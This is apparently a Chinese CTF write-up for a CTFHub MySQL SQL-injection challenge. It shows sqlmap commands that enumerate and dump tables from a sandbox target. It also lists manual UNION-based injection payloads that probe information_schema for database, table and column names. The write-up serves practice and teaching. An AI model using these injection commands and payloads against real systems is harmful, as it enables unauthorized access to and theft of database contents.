CTFHUB-SQL注入-MySQL结构

目录

sqlmap工具夺flag

查看数据库名

查看数据库中表名

查看第一个表中数据

查看第二个表的数据

手动注入

判断是否存在注入

判断字段数量

查询注入点

查询数据库版本

查询数据库名

查看所有数据库

查看表名

查看表中字段

查看表中数据


本题用到sqlmap工具,没有sqlmap工具点击🚀🚀🚀直达下载安装使用教程

sqlmap工具夺flag

查看数据库名

python sqlmap.py -u "http://challenge-f00a2b8be09c8ff3.sandbox.ctfhub.com:10800/?id=1" --current-db --batch

发现了数据库名是 sqli

查看数据库中表名

python sqlmap.py -u "http://challenge-f00a2b8be09c8ff3.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables --batch

发现了2张表,从表名看不出端倪,采用土办法,挨着找

查看第一个表中数据

python sqlmap.py -u "http://challenge-f00a2b8be09c8ff3.sandbox.ctfhub.com:10800/?id=1" -D sqli -T news --dump --batch

并无flag的踪影

查看第二个表的数据

python sqlmap.py -u "http://challenge-f00a2b8be09c8ff3.sandbox.ctfhub.com:10800/?id=1" -D sqli -T ukedvyhohp --dump --batch

在这个表里发现了本题的 flag

手动注入

判断是否存在注入

and 1 = 1
and 1 = 2
or 1 = 1
or 1 = 2
?id=1' and 1' = 1'
?id=1' and 1' = 2'

判断字段数量

order by 1    #正常
order by 2    #正常
order by 3    #异常

查询注入点

1 union select 1,2    #8为异常无回显
-1 union select 1,2   #如果数据不存在数据库中,可以使用负号查找
0 union select 1,2    #如果数据不存在数据库中,也可以使用零查找

查询数据库版本

union select 1,version() 

查询数据库名

union select 1,database()

查看所有数据库

#数据库自带的表information_schema,其中包含所有的数据库信息
#schema_name 数据库名称
union select 1,group_concat(schema_name)from information_schema.schemata

查看表名

#table_name 表格名称
union select 1,group_concat(table_name) from information_schema.tables where table_schema='表名'

查看表中字段

#column_name 字段名称
union select 1,group_concat(column_name) from information_schema.columns where table_schema='库名' and table_name='表名'

查看表中数据

union select 1,group_concat(字段名) from 库名.表名

相关推荐

  1. MySQL SQL 注入

    2024-06-13 10:02:04       36 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-06-13 10:02:04       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-13 10:02:04       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-13 10:02:04       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-13 10:02:04       20 阅读

热门阅读

  1. Perl语言入门学习

    2024-06-13 10:02:04       7 阅读
  2. 用winform开发一个笔记本电脑是否在充电的小工具

    2024-06-13 10:02:04       10 阅读
  3. Linux常用命令大全

    2024-06-13 10:02:04       7 阅读
  4. React常见面试题(2024最新版)

    2024-06-13 10:02:04       9 阅读
  5. 算法笔记 图论和优先级队列的笔记

    2024-06-13 10:02:04       5 阅读
  6. linux开发常用命令

    2024-06-13 10:02:04       6 阅读
  7. 代码整洁之道学习笔记

    2024-06-13 10:02:04       5 阅读
  8. 使用foreach和stream遍历并修改List列表

    2024-06-13 10:02:04       9 阅读
  9. Elasticsearch介绍,要点和难点以及优缺点

    2024-06-13 10:02:04       7 阅读
  10. 智能数据抓取:自动化时代的资讯收割机

    2024-06-13 10:02:04       7 阅读